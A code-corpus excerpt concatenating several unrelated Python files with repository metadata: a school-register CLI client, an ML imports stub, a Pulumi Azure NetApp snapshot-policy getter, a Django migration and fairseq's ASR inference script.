        total_parameters = 0
        for variable in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='rnnlm'):
            shape = variable.get_shape()
            variable_parameters = 1
            for dim in shape:
                variable_parameters *= dim.value
            total_parameters += variable_parameters
        return total_parameters
| 55.155556 | 122 | 0.656796 |
10dc46c386e5b83b3d5e63f3774ca8ec9acddd9c | 2,961 | py | Python | cli-ui/client.py | Fede-26/argoscuolanext-client | f5c85e0ddc38aa5796fd7042075e61062e27fe70 | [
"MIT"
] | 1 | 2019-11-30T17:45:00.000Z | 2019-11-30T17:45:00.000Z | cli-ui/client.py | Fede-26/argoscuolanext-client | f5c85e0ddc38aa5796fd7042075e61062e27fe70 | [
"MIT"
] | null | null | null | cli-ui/client.py | Fede-26/argoscuolanext-client | f5c85e0ddc38aa5796fd7042075e61062e27fe70 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# applicazione principale (avviare questa)
import datetime
import os
import sys
import pprint
pp = pprint.PrettyPrinter(indent=4)
sys.path.append("../modules")
import gestdati as gsd
def voti(raw): #tutti i voti assegnati
    """Stampa tutti i voti assegnati, dal piu' vecchio al piu' recente.

    Fix: l'originale lasciava `voto_pratico` non inizializzato (NameError) per
    codici diversi da N/S/P, e riutilizzava l'etichetta dell'iterazione
    precedente. Un dizionario con valore di default risolve entrambi i casi.
    """
    tipi_voto = {'N': "orale", 'S': "scritto", 'P': "pratico"}
    for x in reversed(raw["dati"]):
        voto_pratico = tipi_voto.get(x["codVotoPratico"], "")
        print(x["datGiorno"], (x["desMateria"].lower()).capitalize(), ": ", x["codVoto"], " - ", voto_pratico, " (", x["desProva"], ")\n")
def cosa_successo_oggi(raw):
    """Stampa materia e argomento per ogni voce del registro di oggi."""
    for voce in raw["dati"]:
        try:
            dettagli = voce["dati"]
            print(dettagli["desMateria"], ": ", dettagli["desArgomento"], "\n")
        except KeyError:
            # Voci senza materia/argomento vengono ignorate.
            pass
def compiti_asse_data(raw): #compiti assegnati una determinata data
    """Chiede una data (mm-gg) e stampa i compiti assegnati quel giorno.

    Fix: l'anno non e' piu' fisso al 2019; viene usato l'anno corrente.
    """
    data = input("Data di assegnamento compiti (mm-gg): ")
    data = str(datetime.date.today().year) + '-' + data
    print()
    for x in raw["dati"]:
        if x["datGiorno"] == data:
            if x["datCompitiPresente"]:
                data_consegna = "per il " + x["datCompiti"]
            else:
                data_consegna = ''
            print(x["datGiorno"], data_consegna, "-", (x["desMateria"].lower()).capitalize(), ": ", x["desCompiti"], "\n")
def compiti_asse_sett(raw): #compiti assegnati fino a 7 giorni prima
    """Stampa i compiti assegnati negli ultimi 7 giorni, in ordine cronologico."""
    oggi = datetime.date.today()
    # Dal giorno piu' vecchio (6 giorni fa) fino a oggi.
    for delta in range(6, -1, -1):
        giorno = str(oggi - datetime.timedelta(days=delta))
        for voce in raw["dati"]:
            if voce["datGiorno"] == giorno:
                print(voce["datGiorno"], "-", (voce["desMateria"].lower()).capitalize(), ": ", voce["desCompiti"], "\n")
def promemoria(raw):
    """Stampa i promemoria con data odierna o futura."""
    soglia = str(datetime.date.today())
    for voce in raw["dati"]:
        # Il confronto lessicografico funziona perche' le date sono ISO (aaaa-mm-gg).
        if voce["datGiorno"] >= soglia:
            print("%s : %s" % (voce["datGiorno"], voce["desAnnotazioni"]))
def main():
    """Menu interattivo: mostra voti, compiti e promemoria finche' l'utente non esce."""
    dati_oggi, dati_voti, dati_compiti, dati_promemoria = gsd.get_dati()
    while 1:
        what_view = input(
            """\n\nCosa vuoi vedere?
(V)oti,
cosa hai fatto (O)ggi,
(C)ompiti, (CS)compiti sett. scorsa,
(P)romemoria
(UP)date,
(del-all)
(99)exit,
[DEBUG: add R for raw output]... """).lower()
        print()
        if what_view == 'v':
            voti(dati_voti)
        elif what_view == 'vr':
            pp.pprint(dati_voti)
        elif what_view == 'o':
            cosa_successo_oggi(dati_oggi)
        elif what_view == 'or':
            pp.pprint(dati_oggi)
        elif what_view == 'c':
            compiti_asse_data(dati_compiti)
        elif what_view == 'cr':
            pp.pprint(dati_compiti)
        elif what_view == 'cs':
            compiti_asse_sett(dati_compiti)
        elif what_view == 'p':
            promemoria(dati_promemoria)
        elif what_view == 'pr':
            pp.pprint(dati_promemoria)
        elif what_view == 'up':
            gsd.update_dati()
            # Fix: in origine il risultato di get_dati() veniva scartato, quindi
            # il menu continuava a mostrare i dati vecchi dopo l'aggiornamento.
            dati_oggi, dati_voti, dati_compiti, dati_promemoria = gsd.get_dati()
        elif what_view == 'del-all':
            try:
                os.remove(gsd.paths["dati"])
                os.remove(gsd.paths["credenziali"])
                exit()
            except FileNotFoundError:
                print("1 or more file not found")
                exit()
        elif what_view == '99':
            exit()
        else:
            print()


if __name__ == '__main__':
    main()
660054c5a92f648080fe4a312b4cfbca46791e75 | 970 | py | Python | part1.py | cewinharhar/BECS2_dataChallenge | da7088316149a800733366c0da6079e0558ad913 | [
"MIT"
] | null | null | null | part1.py | cewinharhar/BECS2_dataChallenge | da7088316149a800733366c0da6079e0558ad913 | [
"MIT"
] | null | null | null | part1.py | cewinharhar/BECS2_dataChallenge | da7088316149a800733366c0da6079e0558ad913 | [
"MIT"
] | null | null | null | #import necessary packages
import os
import random
import xgboost
import joblib
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
plt.style.use('ggplot')
from sklearn import metrics
from sklearn import preprocessing
from sklearn.pipeline import Pipeline
from sklearn.impute import SimpleImputer
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import RandomizedSearchCV
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_selection import SelectFromModel
from sklearn.feature_selection import SequentialFeatureSelector
from sklearn.metrics import classification_report, accuracy_score
from sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay
from sklearn_genetic import GAFeatureSelectionCV
os.getcwd()  # NOTE(review): return value is discarded -- this call has no effect; remove or print/log it.
# Reference snippet kept as a module-level string (never executed):
"""
usage joblib
# save the model:
joblib.dump(model , "model.pkl")
# load the model:
model = joblib.load("model.pkl")
"""
ef774bf625c8c02bb3b54560c0ff555c4ab3cee6 | 7,134 | py | Python | sdk/python/pulumi_azure_native/netapp/v20200501/get_snapshot_policy.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/netapp/v20200501/get_snapshot_policy.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/netapp/v20200501/get_snapshot_policy.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetSnapshotPolicyResult',
'AwaitableGetSnapshotPolicyResult',
'get_snapshot_policy',
]
@pulumi.output_type
class GetSnapshotPolicyResult:
    """
    Snapshot policy information
    """
    # Generated output type: __init__ validates each argument's runtime type,
    # then stores it via pulumi.set; the @property getters read it back.
    def __init__(__self__, daily_schedule=None, enabled=None, hourly_schedule=None, id=None, location=None, monthly_schedule=None, name=None, provisioning_state=None, tags=None, type=None, weekly_schedule=None):
        if daily_schedule and not isinstance(daily_schedule, dict):
            raise TypeError("Expected argument 'daily_schedule' to be a dict")
        pulumi.set(__self__, "daily_schedule", daily_schedule)
        if enabled and not isinstance(enabled, bool):
            raise TypeError("Expected argument 'enabled' to be a bool")
        pulumi.set(__self__, "enabled", enabled)
        if hourly_schedule and not isinstance(hourly_schedule, dict):
            raise TypeError("Expected argument 'hourly_schedule' to be a dict")
        pulumi.set(__self__, "hourly_schedule", hourly_schedule)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if location and not isinstance(location, str):
            raise TypeError("Expected argument 'location' to be a str")
        pulumi.set(__self__, "location", location)
        if monthly_schedule and not isinstance(monthly_schedule, dict):
            raise TypeError("Expected argument 'monthly_schedule' to be a dict")
        pulumi.set(__self__, "monthly_schedule", monthly_schedule)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if provisioning_state and not isinstance(provisioning_state, str):
            raise TypeError("Expected argument 'provisioning_state' to be a str")
        pulumi.set(__self__, "provisioning_state", provisioning_state)
        if tags and not isinstance(tags, dict):
            raise TypeError("Expected argument 'tags' to be a dict")
        pulumi.set(__self__, "tags", tags)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)
        if weekly_schedule and not isinstance(weekly_schedule, dict):
            raise TypeError("Expected argument 'weekly_schedule' to be a dict")
        pulumi.set(__self__, "weekly_schedule", weekly_schedule)

    @property
    @pulumi.getter(name="dailySchedule")
    def daily_schedule(self) -> Optional['outputs.DailyScheduleResponse']:
        """
        Schedule for daily snapshots
        """
        return pulumi.get(self, "daily_schedule")

    @property
    @pulumi.getter
    def enabled(self) -> Optional[bool]:
        """
        The property to decide policy is enabled or not
        """
        return pulumi.get(self, "enabled")

    @property
    @pulumi.getter(name="hourlySchedule")
    def hourly_schedule(self) -> Optional['outputs.HourlyScheduleResponse']:
        """
        Schedule for hourly snapshots
        """
        return pulumi.get(self, "hourly_schedule")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        Resource Id
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def location(self) -> str:
        """
        Resource location
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter(name="monthlySchedule")
    def monthly_schedule(self) -> Optional['outputs.MonthlyScheduleResponse']:
        """
        Schedule for monthly snapshots
        """
        return pulumi.get(self, "monthly_schedule")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        Snapshot policy name
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> str:
        """
        Azure lifecycle management
        """
        return pulumi.get(self, "provisioning_state")

    @property
    @pulumi.getter
    def tags(self) -> Optional[Mapping[str, str]]:
        """
        Resource tags
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Resource type
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter(name="weeklySchedule")
    def weekly_schedule(self) -> Optional['outputs.WeeklyScheduleResponse']:
        """
        Schedule for weekly snapshots
        """
        return pulumi.get(self, "weekly_schedule")
class AwaitableGetSnapshotPolicyResult(GetSnapshotPolicyResult):
    """Awaitable wrapper so the already-resolved invoke result can be `await`ed."""
    # pylint: disable=using-constant-test
    def __await__(self):
        # The result is already resolved: yield nothing and return a plain
        # GetSnapshotPolicyResult immediately.
        if False:
            yield self
        return GetSnapshotPolicyResult(
            daily_schedule=self.daily_schedule,
            enabled=self.enabled,
            hourly_schedule=self.hourly_schedule,
            id=self.id,
            location=self.location,
            monthly_schedule=self.monthly_schedule,
            name=self.name,
            provisioning_state=self.provisioning_state,
            tags=self.tags,
            type=self.type,
            weekly_schedule=self.weekly_schedule)
def get_snapshot_policy(account_name: Optional[str] = None,
                        resource_group_name: Optional[str] = None,
                        snapshot_policy_name: Optional[str] = None,
                        opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSnapshotPolicyResult:
    """
    Snapshot policy information


    :param str account_name: The name of the NetApp account
    :param str resource_group_name: The name of the resource group.
    :param str snapshot_policy_name: The name of the snapshot policy target
    """
    __args__ = dict()
    __args__['accountName'] = account_name
    __args__['resourceGroupName'] = resource_group_name
    __args__['snapshotPolicyName'] = snapshot_policy_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Invoke the provider-side function; the result is already resolved.
    __ret__ = pulumi.runtime.invoke('azure-native:netapp/v20200501:getSnapshotPolicy', __args__, opts=opts, typ=GetSnapshotPolicyResult).value

    # Re-wrap so callers can use the result with `await`.
    return AwaitableGetSnapshotPolicyResult(
        daily_schedule=__ret__.daily_schedule,
        enabled=__ret__.enabled,
        hourly_schedule=__ret__.hourly_schedule,
        id=__ret__.id,
        location=__ret__.location,
        monthly_schedule=__ret__.monthly_schedule,
        name=__ret__.name,
        provisioning_state=__ret__.provisioning_state,
        tags=__ret__.tags,
        type=__ret__.type,
        weekly_schedule=__ret__.weekly_schedule)
| 35.67 | 211 | 0.650407 |
59f10c249f2514c8906f77b34ed888a865f51c3f | 669 | py | Python | api/migrations/0124_eventparticipation_account_owner_status.py | eiling/SchoolIdolAPI | a05980fdb33b143dbe2febfc1ad6cf723f025c8d | [
"Apache-2.0"
] | 65 | 2017-12-29T12:28:11.000Z | 2022-03-15T06:42:26.000Z | api/migrations/0124_eventparticipation_account_owner_status.py | eiling/SchoolIdolAPI | a05980fdb33b143dbe2febfc1ad6cf723f025c8d | [
"Apache-2.0"
] | 31 | 2017-12-18T02:03:09.000Z | 2022-01-13T00:43:35.000Z | api/migrations/0124_eventparticipation_account_owner_status.py | eiling/SchoolIdolAPI | a05980fdb33b143dbe2febfc1ad6cf723f025c8d | [
"Apache-2.0"
] | 7 | 2018-08-27T15:11:01.000Z | 2021-08-16T05:15:13.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0123_auto_20160401_0019'),
]
operations = [
migrations.AddField(
model_name='eventparticipation',
name='account_owner_status',
field=models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')]),
preserve_default=True,
),
]
| 31.857143 | 262 | 0.632287 |
355ccbe141f99ee9739154ad86b41dafaf9eb6b4 | 16,969 | py | Python | edgelm/examples/speech_recognition/new/infer.py | guotao0628/DeepNet | 1ae74d8b44d715bf67c7d64a8efafff4b7c7937a | [
"MIT"
] | 1 | 2021-11-07T00:30:05.000Z | 2021-11-07T00:30:05.000Z | edgelm/examples/speech_recognition/new/infer.py | guotao0628/DeepNet | 1ae74d8b44d715bf67c7d64a8efafff4b7c7937a | [
"MIT"
] | null | null | null | edgelm/examples/speech_recognition/new/infer.py | guotao0628/DeepNet | 1ae74d8b44d715bf67c7d64a8efafff4b7c7937a | [
"MIT"
] | null | null | null | #!/usr/bin/env python -u
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import ast
import hashlib
import logging
import os
import shutil
import sys
from dataclasses import dataclass, field, is_dataclass
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union
import editdistance
import torch
import torch.distributed as dist
from examples.speech_recognition.new.decoders.decoder_config import (
DecoderConfig,
FlashlightDecoderConfig,
)
from examples.speech_recognition.new.decoders.decoder import Decoder
from fairseq import checkpoint_utils, distributed_utils, progress_bar, tasks, utils
from fairseq.data.data_utils import post_process
from fairseq.dataclass.configs import (
CheckpointConfig,
CommonConfig,
CommonEvalConfig,
DatasetConfig,
DistributedTrainingConfig,
FairseqDataclass,
)
from fairseq.logging.meters import StopwatchMeter, TimeMeter
from fairseq.logging.progress_bar import BaseProgressBar
from fairseq.models.fairseq_model import FairseqModel
from omegaconf import OmegaConf
import hydra
from hydra.core.config_store import ConfigStore
# Default module-level logging configuration (may later be replaced by reset_logging()).
logging.root.setLevel(logging.INFO)
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

# Directory holding the hydra YAML configs, relative to this file.
config_path = Path(__file__).resolve().parent / "conf"
@dataclass
class DecodingConfig(DecoderConfig, FlashlightDecoderConfig):
    """Decoder options plus output-location settings for inference."""

    unique_wer_file: bool = field(
        default=False,
        metadata={"help": "If set, use a unique file for storing WER"},
    )
    results_path: Optional[str] = field(
        default=None,
        metadata={
            "help": "If set, write hypothesis and reference sentences into this directory"
        },
    )
@dataclass
class InferConfig(FairseqDataclass):
    """Top-level hydra config for ASR inference: task, decoding, and fairseq groups."""

    task: Any = None
    decoding: DecodingConfig = DecodingConfig()
    common: CommonConfig = CommonConfig()
    common_eval: CommonEvalConfig = CommonEvalConfig()
    checkpoint: CheckpointConfig = CheckpointConfig()
    distributed_training: DistributedTrainingConfig = DistributedTrainingConfig()
    dataset: DatasetConfig = DatasetConfig()
    is_ax: bool = field(
        default=False,
        metadata={
            "help": "if true, assumes we are using ax for tuning and returns a tuple for ax to consume"
        },
    )
def reset_logging():
    """Replace every handler on the root logger with a single stdout handler.

    The handler formats records as "time | level | name | message" and the
    root level is taken from the LOGLEVEL environment variable (default INFO).
    """
    root = logging.getLogger()
    # Iterate over a copy: removing from root.handlers while iterating the
    # live list skips every other handler and leaves stale handlers attached.
    for handler in list(root.handlers):
        root.removeHandler(handler)
    root.setLevel(os.environ.get("LOGLEVEL", "INFO").upper())
    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(
        logging.Formatter(
            fmt="%(asctime)s | %(levelname)s | %(name)s | %(message)s",
            datefmt="%Y-%m-%d %H:%M:%S",
        )
    )
    root.addHandler(handler)
class InferenceProcessor:
    """Runs ASR inference over a dataset and accumulates word-error statistics.

    Use as a context manager (opens/closes result files) and iterate over it
    to obtain batches; feed each batch to process_sample().
    """
    cfg: InferConfig

    def __init__(self, cfg: InferConfig) -> None:
        self.cfg = cfg
        self.task = tasks.setup_task(cfg.task)

        models, saved_cfg = self.load_model_ensemble()
        self.models = models
        self.saved_cfg = saved_cfg
        self.tgt_dict = self.task.target_dictionary

        self.task.load_dataset(
            self.cfg.dataset.gen_subset,
            task_cfg=saved_cfg.task,
        )
        self.generator = Decoder(cfg.decoding, self.tgt_dict)
        self.gen_timer = StopwatchMeter()
        self.wps_meter = TimeMeter()
        # Running totals used to compute the final WER.
        self.num_sentences = 0
        self.total_errors = 0
        self.total_length = 0

        # Result file handles; opened in __enter__ when results_path is set.
        self.hypo_words_file = None
        self.hypo_units_file = None
        self.ref_words_file = None
        self.ref_units_file = None

        self.progress_bar = self.build_progress_bar()

    def __enter__(self) -> "InferenceProcessor":
        if self.cfg.decoding.results_path is not None:
            self.hypo_words_file = self.get_res_file("hypo.word")
            self.hypo_units_file = self.get_res_file("hypo.units")
            self.ref_words_file = self.get_res_file("ref.word")
            self.ref_units_file = self.get_res_file("ref.units")
        return self

    def __exit__(self, *exc) -> bool:
        if self.cfg.decoding.results_path is not None:
            self.hypo_words_file.close()
            self.hypo_units_file.close()
            self.ref_words_file.close()
            self.ref_units_file.close()
        return False

    def __iter__(self) -> Any:
        """Yield batches from the progress bar, moving them to GPU unless on CPU."""
        for sample in self.progress_bar:
            if not self.cfg.common.cpu:
                sample = utils.move_to_cuda(sample)

            # Happens on the last batch.
            if "net_input" not in sample:
                continue
            yield sample

    def log(self, *args, **kwargs):
        self.progress_bar.log(*args, **kwargs)

    def print(self, *args, **kwargs):
        self.progress_bar.print(*args, **kwargs)

    def get_res_file(self, fname: str) -> None:
        """Open a line-buffered result file, shard-suffixed when data-parallel."""
        fname = os.path.join(self.cfg.decoding.results_path, fname)
        if self.data_parallel_world_size > 1:
            fname = f"{fname}.{self.data_parallel_rank}"
        return open(fname, "w", buffering=1)

    def merge_shards(self) -> None:
        """Merges all shard files into shard 0, then removes shard suffix."""
        shard_id = self.data_parallel_rank
        num_shards = self.data_parallel_world_size

        if self.data_parallel_world_size > 1:

            def merge_shards_with_root(fname: str) -> None:
                # Append every shard's contents onto shard 0's file, deleting
                # each shard file as it is consumed, then drop the ".0" suffix.
                fname = os.path.join(self.cfg.decoding.results_path, fname)
                logger.info("Merging %s on shard %d", fname, shard_id)
                base_fpath = Path(f"{fname}.0")
                with open(base_fpath, "a") as out_file:
                    for s in range(1, num_shards):
                        shard_fpath = Path(f"{fname}.{s}")
                        with open(shard_fpath, "r") as in_file:
                            for line in in_file:
                                out_file.write(line)
                        shard_fpath.unlink()
                shutil.move(f"{fname}.0", fname)

            dist.barrier()  # ensure all shards finished writing
            # Spread the four merge jobs across the first few ranks.
            if shard_id == (0 % num_shards):
                merge_shards_with_root("hypo.word")
            if shard_id == (1 % num_shards):
                merge_shards_with_root("hypo.units")
            if shard_id == (2 % num_shards):
                merge_shards_with_root("ref.word")
            if shard_id == (3 % num_shards):
                merge_shards_with_root("ref.units")
            dist.barrier()

    def optimize_model(self, model: FairseqModel) -> None:
        """Prepare a model for inference (generation mode, optional fp16/GPU)."""
        model.make_generation_fast_()
        if self.cfg.common.fp16:
            model.half()
        if not self.cfg.common.cpu:
            model.cuda()

    def load_model_ensemble(self) -> Tuple[List[FairseqModel], FairseqDataclass]:
        """Load the checkpoint ensemble listed in common_eval.path and optimize each model."""
        arg_overrides = ast.literal_eval(self.cfg.common_eval.model_overrides)
        models, saved_cfg = checkpoint_utils.load_model_ensemble(
            utils.split_paths(self.cfg.common_eval.path, separator="\\"),
            arg_overrides=arg_overrides,
            task=self.task,
            suffix=self.cfg.checkpoint.checkpoint_suffix,
            strict=(self.cfg.checkpoint.checkpoint_shard_count == 1),
            num_shards=self.cfg.checkpoint.checkpoint_shard_count,
        )
        for model in models:
            self.optimize_model(model)
        return models, saved_cfg

    def get_dataset_itr(self, disable_iterator_cache: bool = False) -> None:
        """Build the (non-shuffled) epoch iterator over the gen_subset dataset."""
        return self.task.get_batch_iterator(
            dataset=self.task.dataset(self.cfg.dataset.gen_subset),
            max_tokens=self.cfg.dataset.max_tokens,
            max_sentences=self.cfg.dataset.batch_size,
            max_positions=(sys.maxsize, sys.maxsize),
            ignore_invalid_inputs=self.cfg.dataset.skip_invalid_size_inputs_valid_test,
            required_batch_size_multiple=self.cfg.dataset.required_batch_size_multiple,
            seed=self.cfg.common.seed,
            num_shards=self.data_parallel_world_size,
            shard_id=self.data_parallel_rank,
            num_workers=self.cfg.dataset.num_workers,
            data_buffer_size=self.cfg.dataset.data_buffer_size,
            disable_iterator_cache=disable_iterator_cache,
        ).next_epoch_itr(shuffle=False)

    def build_progress_bar(
        self,
        epoch: Optional[int] = None,
        prefix: Optional[str] = None,
        default_log_format: str = "tqdm",
    ) -> BaseProgressBar:
        return progress_bar.progress_bar(
            iterator=self.get_dataset_itr(),
            log_format=self.cfg.common.log_format,
            log_interval=self.cfg.common.log_interval,
            epoch=epoch,
            prefix=prefix,
            tensorboard_logdir=self.cfg.common.tensorboard_logdir,
            default_log_format=default_log_format,
        )

    @property
    def data_parallel_world_size(self):
        if self.cfg.distributed_training.distributed_world_size == 1:
            return 1
        return distributed_utils.get_data_parallel_world_size()

    @property
    def data_parallel_rank(self):
        if self.cfg.distributed_training.distributed_world_size == 1:
            return 0
        return distributed_utils.get_data_parallel_rank()

    def process_sentence(
        self,
        sample: Dict[str, Any],
        hypo: Dict[str, Any],
        sid: int,
        batch_id: int,
    ) -> Tuple[int, int]:
        """Score one hypothesis against its reference.

        Returns (word_edit_distance, reference_word_count) for WER accumulation;
        also writes results files and logs the pair unless quiet.
        """
        speaker = None  # Speaker can't be parsed from dataset.

        if "target_label" in sample:
            toks = sample["target_label"]
        else:
            toks = sample["target"]
        toks = toks[batch_id, :]

        # Processes hypothesis.
        hyp_pieces = self.tgt_dict.string(hypo["tokens"].int().cpu())
        if "words" in hypo:
            hyp_words = " ".join(hypo["words"])
        else:
            hyp_words = post_process(hyp_pieces, self.cfg.common_eval.post_process)

        # Processes target.
        target_tokens = utils.strip_pad(toks, self.tgt_dict.pad())
        tgt_pieces = self.tgt_dict.string(target_tokens.int().cpu())
        tgt_words = post_process(tgt_pieces, self.cfg.common_eval.post_process)

        if self.cfg.decoding.results_path is not None:
            print(f"{hyp_pieces} ({speaker}-{sid})", file=self.hypo_units_file)
            print(f"{hyp_words} ({speaker}-{sid})", file=self.hypo_words_file)
            print(f"{tgt_pieces} ({speaker}-{sid})", file=self.ref_units_file)
            print(f"{tgt_words} ({speaker}-{sid})", file=self.ref_words_file)

        if not self.cfg.common_eval.quiet:
            logger.info(f"HYPO: {hyp_words}")
            logger.info(f"REF: {tgt_words}")
            logger.info("---------------------")

        hyp_words, tgt_words = hyp_words.split(), tgt_words.split()

        return editdistance.eval(hyp_words, tgt_words), len(tgt_words)

    def process_sample(self, sample: Dict[str, Any]) -> None:
        """Decode one batch and fold its error/length counts into the totals."""
        self.gen_timer.start()
        hypos = self.task.inference_step(
            generator=self.generator,
            models=self.models,
            sample=sample,
        )
        num_generated_tokens = sum(len(h[0]["tokens"]) for h in hypos)
        self.gen_timer.stop(num_generated_tokens)
        self.wps_meter.update(num_generated_tokens)

        for batch_id, sample_id in enumerate(sample["id"].tolist()):
            errs, length = self.process_sentence(
                sample=sample,
                sid=sample_id,
                batch_id=batch_id,
                hypo=hypos[batch_id][0],
            )
            self.total_errors += errs
            self.total_length += length

        self.log({"wps": round(self.wps_meter.avg)})
        if "nsentences" in sample:
            self.num_sentences += sample["nsentences"]
        else:
            self.num_sentences += sample["id"].numel()

    def log_generation_time(self) -> None:
        logger.info(
            "Processed %d sentences (%d tokens) in %.1fs %.2f "
            "sentences per second, %.2f tokens per second)",
            self.num_sentences,
            self.gen_timer.n,
            self.gen_timer.sum,
            self.num_sentences / self.gen_timer.sum,
            1.0 / self.gen_timer.avg,
        )
def parse_wer(wer_file: Path) -> float:
    """Read the WER value from the first line of *wer_file* ("WER: <value>")."""
    with open(wer_file, "r") as handle:
        first_line = handle.readline()
    return float(first_line.strip().split(" ")[1])
def get_wer_file(cfg: InferConfig) -> Path:
    """Hashes the decoding parameters to a unique file ID."""
    wer_path = "wer"
    if cfg.decoding.results_path is not None:
        wer_path = os.path.join(cfg.decoding.results_path, wer_path)
    if not cfg.decoding.unique_wer_file:
        return Path(wer_path)
    # Derive a stable numeric suffix from the decoding config's YAML dump.
    yaml_repr = OmegaConf.to_yaml(cfg.decoding)
    digest = int(hashlib.md5(yaml_repr.encode("utf-8")).hexdigest(), 16)
    return Path(f"{wer_path}.{digest % 1000000}")
def main(cfg: InferConfig) -> float:
    """Entry point for main processing logic.

    Runs inference over the configured dataset, aggregates word-error
    statistics (across data-parallel workers when applicable), and writes the
    result to the file returned by ``get_wer_file``.

    Args:
        cfg: The inference configuration to use.

    Returns:
        The final word error rate (percent).
    """
    yaml_str, wer_file = OmegaConf.to_yaml(cfg.decoding), get_wer_file(cfg)

    # Validates the provided configuration.
    if cfg.dataset.max_tokens is None and cfg.dataset.batch_size is None:
        cfg.dataset.max_tokens = 4000000
    if not cfg.common.cpu and not torch.cuda.is_available():
        raise ValueError("CUDA not found; set `cpu=True` to run without CUDA")

    with InferenceProcessor(cfg) as processor:
        for sample in processor:
            processor.process_sample(sample)

        processor.log_generation_time()

        if cfg.decoding.results_path is not None:
            processor.merge_shards()

        errs_t, leng_t = processor.total_errors, processor.total_length

        if cfg.common.cpu:
            logger.warning("Merging WER requires CUDA.")
        elif processor.data_parallel_world_size > 1:
            # Sum the (errors, reference length) counters over all workers so
            # every rank ends up with the global totals.
            stats = torch.LongTensor([errs_t, leng_t]).cuda()
            dist.all_reduce(stats, op=dist.ReduceOp.SUM)
            errs_t, leng_t = stats[0].item(), stats[1].item()

        wer = errs_t * 100.0 / leng_t

        # Only the master rank writes the results file.
        if distributed_utils.is_master(cfg.distributed_training):
            with open(wer_file, "w") as f:
                f.write(
                    (
                        f"WER: {wer}\n"
                        f"err / num_ref_words = {errs_t} / {leng_t}\n\n"
                        f"{yaml_str}"
                    )
                )

        return wer
@hydra.main(config_path=config_path, config_name="infer")
def hydra_main(cfg: InferConfig) -> Union[float, Tuple[float, Optional[float]]]:
    """Hydra entry point: run inference and report the resulting WER.

    Returns the WER as a float, or a ``(wer, None)`` pair when running under
    an Ax sweep (``cfg.is_ax``).
    """
    # Re-materialize the config so interpolations are resolved and enum
    # values become plain strings, then lock the schema.
    cfg = OmegaConf.create(OmegaConf.to_container(cfg, resolve=True, enum_to_str=True))
    OmegaConf.set_struct(cfg, True)

    if cfg.common.reset_logging:
        reset_logging()
    # logger.info("Config:\n%s", OmegaConf.to_yaml(cfg))

    wer = float("inf")
    try:
        if cfg.common.profile:
            with torch.cuda.profiler.profile(), torch.autograd.profiler.emit_nvtx():
                distributed_utils.call_main(cfg, main)
        else:
            distributed_utils.call_main(cfg, main)
        wer = parse_wer(get_wer_file(cfg))
    except BaseException as exc:  # pylint: disable=broad-except
        if not cfg.common.suppress_crashes:
            raise
        logger.error("Crashed! %s", str(exc))

    logger.info("Word error rate: %.4f", wer)
    return (wer, None) if cfg.is_ax else wer
def cli_main() -> None:
    """Command-line entry point: register configs with Hydra and dispatch."""
    cfg_name = "infer"
    try:
        # pylint: disable=import-outside-toplevel
        from hydra._internal.utils import get_args

        cfg_name = get_args().config_name or "infer"
    except ImportError:
        logger.warning("Failed to get config name from hydra args")

    cs = ConfigStore.instance()
    cs.store(name=cfg_name, node=InferConfig)
    # Also register every dataclass-typed sub-config under its field name so
    # it can be overridden individually on the command line.
    for field_name, field in InferConfig.__dataclass_fields__.items():
        if is_dataclass(field.type):
            cs.store(name=field_name, node=field.default)

    hydra_main()  # pylint: disable=no-value-for-parameter
if __name__ == "__main__":
    # Script entry point: keep the module importable without side effects.
    cli_main()
| 35.951271 | 104 | 0.611645 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.